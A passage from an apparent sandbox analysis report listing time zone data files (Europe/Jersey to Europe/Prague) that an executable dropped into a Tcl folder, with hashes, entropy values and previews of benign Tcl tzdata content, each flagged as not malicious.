EEST}. {-639025200 7200 0 EET}.

C:\Users\user\Desktop\tcl\tzdata\Europe\Jersey Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	176
Entropy (8bit):	4.831245786685746
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxVxKL82wFVAIgoqyKL8p6yQap6cEBx/yQavKL8i:SlSWB9IZaM3ymvKA2wFVAIgovKAUyzO5
MD5:	F43ABA235B8B98F5C64181ABD1CEEC3A
SHA1:	A4A7D71ED148FBE53C2DF7497A89715EB24E84B7
SHA-256:	8E97798BE473F535816D6D9307B85102C03CC860D3690FE59E0B7EEF94D62D54
SHA-512:	B0E0FC97F08CB656E228353594FC907FC94A998859BB22648BF78043063932D0FC7282D31F63FCB79216218695B5DCDF298C37F0CB206160798CF3CA2C7598E1
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/London)]} {. LoadTimeZoneFile Europe/London.}.set TZData(:Europe/Jersey) $TZData(:Europe/London).

C:\Users\user\Desktop\tcl\tzdata\Europe\Kaliningrad Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2369
Entropy (8bit):	3.8767665807730056
Encrypted:	false
SSDEEP:	48:cGv6a621nwJ2JoJrprXnW0UiVV0Qv3LEevBFoBGrjI9q1F008bBJdT:cGvt67yurprXWTeV/DYtX9
MD5:	FBCBB684A231BAB14E004DD9C5BF3EE3
SHA1:	D7CCCAB46E58E5A94069D8A5613C1D1A41153B79
SHA-256:	F5A29C5166E9101D782845772C562239B5B82B0129543E5719A6BB89D9617949
SHA-512:	98B771C03DCAD8DCD3949DE734474C83B073C5CF9283857093BD342D38BDECDD542A7C20B18AEB620CA6B06BBC72CED11DCF2B91B856803F5A6F0728C554CE28
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Kaliningrad) {. {-9223372036854775808 4920 0 LMT}. {-2422056120 3600 0 CET}. {-1693706400 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1663455600 7200 1 CEST}. {-1650150000 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-938905200 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-788922000 7200 0 CET}. {-778730400 10800 1 CEST}. {-762663600 7200 0 CET}. {-757389600 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}

C:\Users\user\Desktop\tcl\tzdata\Europe\Kiev Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7200
Entropy (8bit):	3.672920710705179
Encrypted:	false
SSDEEP:	96:j/fE2JyurxVaKl9sUM2kNU4tztagAwkY5V778e27zo2yiQ6kjmyykeP2lwtOEZ9A:j/fN8G2h2kNU4tB715pyzHy1gA
MD5:	13741DB275EB16C2400E9ED056FFC7A5
SHA1:	35B52592F4ED24F993DF4B44AFD6BD7AA5EDE7B5
SHA-256:	C4753749B948962D1AA74996C5C87EDA44DD6DCD047297013C4D5011CB87DB90
SHA-512:	FBCC3A2CBAAA7549209B92A17EE4E3E105A7A004D948DB48D3C2715A58B7713D58C0AAE75F816CEE0031589A8440457BB13531DDC41199C4D2D766DA55CE8306
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Kiev) {. {-9223372036854775808 7324 0 LMT}. {-2840148124 7324 0 KMT}. {-1441159324 7200 0 EET}. {-1247536800 10800 0 MSK}. {-892522800 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-825382800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {646786800 7200 0 EET}. {694216800 7200 0 EET}. {701820000 10800 1 EEST}. {717541200 7200 0 EET}. {733269600 108

C:\Users\user\Desktop\tcl\tzdata\Europe\Lisbon Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9471
Entropy (8bit):	3.7391980541103296
Encrypted:	false
SSDEEP:	192:kzgVSz+IZHX68PlXIFj544IrvfMsbxZTH7qwQ:kzYSz+IZHX68PlYFUM8xZTH7qwQ
MD5:	9C7AACDBECC1C8034DCD54B22078A805
SHA1:	B733D1E7EC7CBD27656895A3A9C3689280781CE4
SHA-256:	DA4B3330A7A5722C34FDFD765A1AFA9F8955437DF63578AE8B9DACD8A3D6090E
SHA-512:	E1FB6BB3BEF79C945061BB4678E561DAD9B28885A7B846FA5C882339F9C7B5C675E7024EDD34AC83EAE601842A957E11B8E1090EEB34A1CA0A0F8804B6289A3E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Lisbon) {. {-9223372036854775808 -2192 0 LMT}. {-2713908208 -2192 0 LMT}. {-1830381808 0 0 WET}. {-1689555600 3600 1 WEST}. {-1677801600 0 0 WET}. {-1667437200 3600 1 WEST}. {-1647738000 0 0 WET}. {-1635814800 3600 1 WEST}. {-1616202000 0 0 WET}. {-1604365200 3600 1 WEST}. {-1584666000 0 0 WET}. {-1572742800 3600 1 WEST}. {-1553043600 0 0 WET}. {-1541206800 3600 1 WEST}. {-1521507600 0 0 WET}. {-1442451600 3600 1 WEST}. {-1426813200 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1221440400 3600 1 WEST}. {-1206925200 0 0 WET}. {-1191200400 3600 1 WEST}. {-1175475600 0 0 WET}. {-1127696400 3600 1 WEST}. {-1111971600 0 0 WET}. {-1096851600 3600 1 WEST}. {-1080522000

C:\Users\user\Desktop\tcl\tzdata\Europe\Ljubljana Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.901869793666386
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQavPSJ5QahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vqm
MD5:	5F2AEC41DECD9E26955876080C56B247
SHA1:	4FDEC0926933AE5651DE095C519A2C4F9E567691
SHA-256:	88146DA16536CCF587907511FB0EDF40E392E6F6A6EFAB38260D3345CF2832E1
SHA-512:	B71B6C21071DED75B9B36D49EB5A779C5F74817FF070F70FEAB9E3E719E5F1937867547852052AA7BBAE8B842493FBC7DFAFD3AC47B70D36893541419DDB2D74
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Ljubljana) $TZData(:Europe/Belgrade).

C:\Users\user\Desktop\tcl\tzdata\Europe\London Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	9839
Entropy (8bit):	3.737361476589814
Encrypted:	false
SSDEEP:	192:Gj4y1xZfvm8nKrhFs3XRnRaQqTLJaMt/VZ1R6Y+:GjPxZfvmgEhS3XRmau/VZ1R6Y+
MD5:	2A53A87C26A5D2AF62ECAAD8CECBF0D7
SHA1:	025D31C1D32F1100C1B00858929FD29B4E66E8F6
SHA-256:	2A69A7C9A2EE3057EBDB2615DBE5CB08F5D334210449DC3E42EA88564C29583A
SHA-512:	81EFA13E4AB30A9363E80EC1F464CC51F8DF3C492771494F3624844E074BA9B84FE50EF6C32F9467E6DAB41BD5159B492B752D0C97F3CB2F4B698C04E68C0255
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/London) {. {-9223372036854775808 -75 0 LMT}. {-3852662325 0 0 GMT}. {-1691964000 3600 1 BST}. {-1680472800 0 0 GMT}. {-1664143200 3600 1 BST}. {-1650146400 0 0 GMT}. {-1633903200 3600 1 BST}. {-1617487200 0 0 GMT}. {-1601848800 3600 1 BST}. {-1586037600 0 0 GMT}. {-1570399200 3600 1 BST}. {-1552168800 0 0 GMT}. {-1538344800 3600 1 BST}. {-1522533600 0 0 GMT}. {-1507500000 3600 1 BST}. {-1490565600 0 0 GMT}. {-1473631200 3600 1 BST}. {-1460930400 0 0 GMT}. {-1442786400 3600 1 BST}. {-1428876000 0 0 GMT}. {-1410732000 3600 1 BST}. {-1396216800 0 0 GMT}. {-1379282400 3600 1 BST}. {-1364767200 0 0 GMT}. {-1348437600 3600 1 BST}. {-1333317600 0 0 GMT}. {-1315778400 3600 1 BST}. {-1301263200 0 0 GMT}. {-1284328800 3600 1 BST}. {-1269813600 0 0 GMT}. {-1253484000 3600 1 BST}. {-1238364000 0 0 GMT}. {-1221429600 3600 1 BST}. {-120

C:\Users\user\Desktop\tcl\tzdata\Europe\Luxembourg Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8826
Entropy (8bit):	3.7634145613638657
Encrypted:	false
SSDEEP:	96:TYt4c9+dcVhv9HMLftvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAr:0w2h1QSTRNH4Mn82rlo6XIZ9ALeBO
MD5:	804A17ED0B32B9751C38110D28EB418B
SHA1:	24235897E163D33970451C48C4260F6C10C56ADD
SHA-256:	00E8152B3E5CD216E4FD8A992250C46E600E2AD773EEDDD87DAD31012BE55693
SHA-512:	53AFDDE8D516CED5C6CF0A906DBF72AF09A62278D1FC4D5C1562BBCE853D322457A6346C3DE8F112FCF665102E19A2E677972E941D0C80D0AB7C8DD0B694628E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Luxembourg) {. {-9223372036854775808 1476 0 LMT}. {-2069713476 3600 0 CET}. {-1692496800 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1662343200 7200 1 CEST}. {-1650157200 3600 0 CET}. {-1632006000 7200 1 CEST}. {-1618700400 3600 0 CET}. {-1612659600 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585519200 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552258800 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520550000 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490572800 0 0 WET}. {-1473642000 3600 1 WEST}. {-1459119600 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427673600 0 0 WET}. {-1411866000 3600 1 WEST}. {-1396224000 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364774400 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333324800 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301270400 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269813600 0 0 WET}. {-1253484000 3600 1 WEST}. {-

C:\Users\user\Desktop\tcl\tzdata\Europe\Madrid Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8282
Entropy (8bit):	3.756812378817409
Encrypted:	false
SSDEEP:	96:kHB87tmDnTNSSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZY:oOMUSTRNH4Mn82rlo6XIZ9ALeBO
MD5:	4BC0D203C28DF6DCB2C9595DFFA3E5C7
SHA1:	0A592FFBD7703AF803BF7EDA96E7BE9A3551A72E
SHA-256:	7F1EC4E7AC29B935823B0155CA07C1FE3092E7202EC0DE3F3CBD8FB9D5E795FB
SHA-512:	B651AF5693A7A8F7816F526AB3AE0548F953AB49125E113F2C906CF9050F4F0ECF9F59F1CBDFC9E5E6F6FB5D46E7E1F9B7A5D2C8D270B7C32063355582393118
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Madrid) {. {-9223372036854775808 -884 0 LMT}. {-2177451916 0 0 WET}. {-1661734800 3600 1 WEST}. {-1648429200 0 0 WET}. {-1631926800 3600 1 WEST}. {-1616893200 0 0 WET}. {-1601254800 3600 1 WEST}. {-1585357200 0 0 WET}. {-1442451600 3600 1 WEST}. {-1427677200 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1029114000 3600 1 WEST}. {-1017622800 0 0 WET}. {-1002848400 3600 1 WEST}. {-986173200 0 0 WET}. {-969238800 3600 1 WEST}. {-954118800 0 0 WET}. {-940208400 3600 1 WEST}. {-873079200 7200 1 WEMT}. {-862538400 3600 1 WEST}. {-842839200 7200 1 WEMT}. {-828237600 3600 1 WEST}. {-811389600 7200 1 WEMT}. {-796010400 3600 1 WEST}. {-779940000 7200 1 WEMT}. {-765421200 3

C:\Users\user\Desktop\tcl\tzdata\Europe\Malta Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8425
Entropy (8bit):	3.7277252681393933
Encrypted:	false
SSDEEP:	96:wpTw6hpNqX5vln3mcRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0c:wL0JvlJRNH4Mn82rlo6XIZ9ALeBO
MD5:	B6E871EFFA21231DA8D2B45401F09011
SHA1:	4766A6C2B75F3B739E9D0418F56163D529AF9DEF
SHA-256:	9D766E6E252EA2F30811661549B3359A351C42C6558793DCD4919B55A23DE632
SHA-512:	29E146CAAE7E3F289015405809410FA56C52C472812F5579A8907DF4E09292D4ED200E75F13850A8CE740FB4FD840A629FEA7F3398C60E7A8E8D8A317C8C49CA
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Malta) {. {-9223372036854775808 3484 0 LMT}. {-2403478684 3600 0 CET}. {-1690851600 7200 1 CEST}. {-1680483600 3600 0 CET}. {-1664758800 7200 1 CEST}. {-1649034000 3600 0 CET}. {-1635123600 7200 1 CEST}. {-1616979600 3600 0 CET}. {-1604278800 7200 1 CEST}. {-1585530000 3600 0 CET}. {-1571014800 7200 1 CEST}. {-1555290000 3600 0 CET}. {-932432400 7200 1 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 0 CEST}. {-766717200 3600 0 CET}. {-750898800 7200 1 CEST}. {-733359600 3600 0 CET}. {-719456400 7200 1 CEST}. {-701917200 3600 0 CET}. {-689209200 7200 1 CEST}. {-670460400 3600 0 CET}. {-114051600 7200 1 CEST}. {-103168800 3600 0 CET}. {-81997200 7200 1 CEST}. {-71719200 3600 0 CET}. {-50547600 7200 1 CEST}. {-40269600 3600 0 CET}

C:\Users\user\Desktop\tcl\tzdata\Europe\Mariehamn Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.913470013356756
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxV1AYKjGyVAIgoq2AYKjvCW6yQausWILMFJ8QarAYKa:SlSWB9IZaM3ymrAdjGyVAIgorAdjoyGK
MD5:	CFB0DE2E11B8AF400537BD0EF493C004
SHA1:	32E8FCB8571575E9DFE09A966F88C7D3EBCD183E
SHA-256:	5F82A28F1FEE42693FD8F3795F8E0D7E8C15BADF1FD9EE4D45794C4C0F36108C
SHA-512:	9E36B2EACA06F84D56D9A9A0A83C7C106D26A6A55CBAA696729F105600F5A0105F193899D5996C416EFAABC4649E91BA0ED90D38E8DF7B305C6D951A31C80718
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Helsinki)]} {. LoadTimeZoneFile Europe/Helsinki.}.set TZData(:Europe/Mariehamn) $TZData(:Europe/Helsinki).

C:\Users\user\Desktop\tcl\tzdata\Europe\Minsk Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2072
Entropy (8bit):	3.850874699236306
Encrypted:	false
SSDEEP:	48:K6ccjMsJ2JoJrZiuRVV0Qv3LEevBFoBGrjI9q1F008bBJdT:PRjMAyurZTV/DYtX9
MD5:	D72EB835D4C93196EAA246F455C56FD3
SHA1:	A6B60504F300D8CE0AB194B1EC25331315EBA6FF
SHA-256:	69DC5909881F2A87E991136BB6B4284FBB1FAB5BAF29845226DD2F1F3AD3EBB6
SHA-512:	34BEADC41FE08143FA1BE4F74B08C03F743C4B306FC23E83FE51142837AF60F9383899636EE40DD96AC1C5A65FDF39BC07AAE4977643058055A41CFC3A36DD25
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Minsk) {. {-9223372036854775808 6616 0 LMT}. {-2840147416 6600 0 MMT}. {-1441158600 7200 0 EET}. {-1247536800 10800 0 MSK}. {-899780400 3600 0 CET}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-804646800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800 0 MSK}. {606870000 14400 1 MSD}. {622594800 10800 0 MSK}. {631141200 10800 0 MSK}. {670374000 10800 1 EEST}. {686102400 7200 0 EET}. {701820000 10800 1 EEST}. {71754480

C:\Users\user\Desktop\tcl\tzdata\Europe\Monaco Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8871
Entropy (8bit):	3.7700564621466666
Encrypted:	false
SSDEEP:	96:2LCV8tXttpD72RXbvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHT/:eAYt+STRNH4Mn82rlo6XIZ9ALeBO
MD5:	B2BA91B2CDD19E255B68EA35E033C061
SHA1:	246E377E815FFC11BBAF898E952194FBEDAE9AA2
SHA-256:	768E3D45DB560777C8E13ED9237956CFE8630D840683FAD065A2F6948FD797BE
SHA-512:	607383524C478F1CB442679F6DE0964F8916EE1A8B0EF6806BDF7652E4520B0E842A611B432FB190C30C391180EA1867268BBBF6067310F70D5E72CB3E4D789F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Monaco) {. {-9223372036854775808 1772 0 LMT}. {-2486680172 561 0 PMT}. {-1855958961 0 0 WET}. {-1689814800 3600 1 WEST}. {-1680397200 0 0 WET}. {-1665363600 3600 1 WEST}. {-1648342800 0 0 WET}. {-1635123600 3600 1 WEST}. {-1616893200 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585443600 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1470618000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1253494800 3600 1 WEST}. {-1238374800 0 0

C:\Users\user\Desktop\tcl\tzdata\Europe\Moscow Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	2348
Entropy (8bit):	3.8485032810607995
Encrypted:	false
SSDEEP:	24:cYeOngzFgEFFkebUe9clUetph7+UeGH3UeRUeIuUeKqCbUeaJJUevTkUetUeibEX:3ngzJF78xJ2JoJrprXnECL9yLI0vjlR
MD5:	B70F0638493B5690C825335FF9337849
SHA1:	5AA0B03B5559B808B6B4D7CFAA3F5D33C4057182
SHA-256:	89F89C82CCC8CFE0063BC3AB37CADB6F77E8960EFC9355C12FAFA30B451D71AA
SHA-512:	FA466E98640A7D23A770B558D71B77C6F7DC9D638BA4F8AC906C3321B5811061A0F60334E01896491822458B8D10C791F5B17489731EA6CE11BBFD4210AFDE31
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Moscow) {. {-9223372036854775808 9020 0 LMT}. {-2840149820 9000 0 MMT}. {-1688265000 9048 0 MMT}. {-1656819048 12648 1 MST}. {-1641353448 9048 0 MMT}. {-1627965048 16248 1 MDST}. {-1618716648 12648 1 MST}. {-1596429048 16248 1 MDST}. {-1593822648 14400 0 MSD}. {-1589860800 10800 0 MSK}. {-1542427200 14400 1 MSD}. {-1539493200 18000 1 MSD}. {-1525323600 14400 1 MSD}. {-1522728000 10800 0 MSK}. {-1491188400 7200 0 EET}. {-1247536800 10800 0 MSD}. {354920400 14400 1 MSD}. {370728000 10800 0 MSK}. {386456400 14400 1 MSD}. {402264000 10800 0 MSK}. {417992400 14400 1 MSD}. {433800000 10800 0 MSK}. {449614800 14400 1 MSD}. {465346800 10800 0 MSK}. {481071600 14400 1 MSD}. {496796400 10800 0 MSK}. {512521200 14400 1 MSD}. {528246000 10800 0 MSK}. {543970800 14400 1 MSD}. {559695600 10800 0 MSK}. {575420400 14400 1 MSD}. {591145200 10800

C:\Users\user\Desktop\tcl\tzdata\Europe\Nicosia Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	174
Entropy (8bit):	4.73570159193188
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq85GKLWVAIgNwMGKLG6yQatHefeWFKYGKL1:SlSWB9IZaM3yZdLWVAIgGMdL9y3HefeW
MD5:	47C275C076A278CA8E1FF24E9E46CC22
SHA1:	55992974C353552467C2B57E3955E4DD86BBFAD2
SHA-256:	34B61E78EF15EA98C056C1AC8C6F1FA0AE87BD6BC85C58BE8DA44D017B2CA387
SHA-512:	1F74FC0B452C0BE35360D1C9EC8347063E8480CA37BE893FD4FF7FC2279B7D0C0909A26763C7755DFB19BE9736340D3FB00D39E9F6BF23C1D2F0015372139847
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Asia/Nicosia)]} {. LoadTimeZoneFile Asia/Nicosia.}.set TZData(:Europe/Nicosia) $TZData(:Asia/Nicosia).

C:\Users\user\Desktop\tcl\tzdata\Europe\Oslo Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7651
Entropy (8bit):	3.7309855254369766
Encrypted:	false
SSDEEP:	96:aG6sT+cQJWxdocRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQt:abcQJWxd/RNH4Mn82rlo6XIZ9ALeBO
MD5:	2A3F771DD9EAE2E9C1D8394C12C0ED71
SHA1:	541DCF144EFFE2DFF27B81A50D245C7385CC0871
SHA-256:	8DDFB0296622E0BFDBEF4D0C2B4EA2522DE26A16D05340DFECA320C0E7B2B1F7
SHA-512:	E1526BD21E379F8B2285481E3E12C1CF775AE43E205D3E7E4A1906B87821D5E15B101B24463A055B6013879CD2777112C7F27B5C5220F280E3C48240367AA663
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Oslo) {. {-9223372036854775808 2580 0 LMT}. {-2366757780 3600 0 CET}. {-1691884800 7200 1 CEST}. {-1680573600 3600 0 CET}. {-927511200 7200 0 CEST}. {-857257200 3600 0 CET}. {-844556400 7200 1 CEST}. {-828226800 3600 0 CET}. {-812502000 7200 1 CEST}. {-796777200 3600 0 CET}. {-781052400 7200 0 CEST}. {-765327600 3600 0 CET}. {-340844400 7200 1 CEST}. {-324514800 3600 0 CET}. {-308790000 7200 1 CEST}. {-293065200 3600 0 CET}. {-277340400 7200 1 CEST}. {-261615600 3600 0 CET}. {-245890800 7200 1 CEST}. {-230166000 3600 0 CET}. {-214441200 7200 1 CEST}. {-198716400 3600 0 CET}. {-182991600 7200 1 CEST}. {-166662000 3600 0 CET}. {-147913200 7200 1 CEST}. {-135212400 3600 0 CET}. {315529200 3600 0 CET}. {323830800 7200 1 CEST}. {338950800 3600 0 CET}. {354675600 7200 1 CEST}. {370400400 3600 0 CET}. {386125200 7200 1 CEST}. {40185

C:\Users\user\Desktop\tcl\tzdata\Europe\Paris Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8838
Entropy (8bit):	3.7637328221887567
Encrypted:	false
SSDEEP:	96:1XV8tXttpD724lvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIu:1FYtPSTRNH4Mn82rlo6XIZ9ALeBO
MD5:	153CA0EF3813D91C5E23B34ADFE7A318
SHA1:	F7F18CB34424A9B62172F00374853F1D4A89BEE4
SHA-256:	092BF010A1CF3819B102C2A70340F4D67C87BE2E6A8154716241012B5DFABD88
SHA-512:	E2D418D43D9DFD169238DDB0E790714D3B88D16398FA041A9646CB35F24EF79EE48DA4B6201E6A598E89D4C651F8A2FB9FB874B2010A51B3CD35A86767BAF4D2
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Europe/Paris) {. {-9223372036854775808 561 0 LMT}. {-2486678901 561 0 PMT}. {-1855958901 0 0 WET}. {-1689814800 3600 1 WEST}. {-1680397200 0 0 WET}. {-1665363600 3600 1 WEST}. {-1648342800 0 0 WET}. {-1635123600 3600 1 WEST}. {-1616893200 0 0 WET}. {-1604278800 3600 1 WEST}. {-1585443600 0 0 WET}. {-1574038800 3600 1 WEST}. {-1552266000 0 0 WET}. {-1539997200 3600 1 WEST}. {-1520557200 0 0 WET}. {-1507510800 3600 1 WEST}. {-1490576400 0 0 WET}. {-1470618000 3600 1 WEST}. {-1459126800 0 0 WET}. {-1444006800 3600 1 WEST}. {-1427677200 0 0 WET}. {-1411952400 3600 1 WEST}. {-1396227600 0 0 WET}. {-1379293200 3600 1 WEST}. {-1364778000 0 0 WET}. {-1348448400 3600 1 WEST}. {-1333328400 0 0 WET}. {-1316394000 3600 1 WEST}. {-1301274000 0 0 WET}. {-1284339600 3600 1 WEST}. {-1269824400 0 0 WET}. {-1253494800 3600 1 WEST}. {-1238374800 0 0 W

C:\Users\user\Desktop\tcl\tzdata\Europe\Podgorica Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.86256001696314
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqxV/sUE2tvFVAIgoq8sUE2vqLyQazKIGl1/yQahsUE2u:SlSWB9IZaM3ymhrE2tvFVAIgohrE2vq7
MD5:	4F430ECF91032E40457F2D2734887860
SHA1:	D1C099523C34ED0BD48C24A511377B232548591D
SHA-256:	F5AB2E253CA0AB7A9C905B720B19F713469877DE1874D5AF81A8F3E74BA17FC8
SHA-512:	2E6E73076A18F1C6C8E89949899F81F232AE66FEB8FFA2A5CE5447FFF581A0D5E0E88DABEAA3C858CC5544C2AE9C6717E590E846CBFD58CEF3B7558F677334FB
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Europe/Belgrade)]} {. LoadTimeZoneFile Europe/Belgrade.}.set TZData(:Europe/Podgorica) $TZData(:Europe/Belgrade).

C:\Users\user\Desktop\tcl\tzdata\Europe\Prague Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7684
Entropy (8bit):	3.7339342503071604
Encrypted:	false
SSDEEP:	96:3NtqSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQltUbAyzU:3+STRNH4Mn82rlo6XIZ9ALeBO
MD5:	9CBA0FD603583AED62B969E8CCF0A356
SHA1:	A2EF7D60181976E2225D15DB40F9BCE4FBF82E8D
SHA-256:	B0CE7042D39DE578FDDBCEFE9EAE793C044F036E80AA4F723C9F284F7C32262E
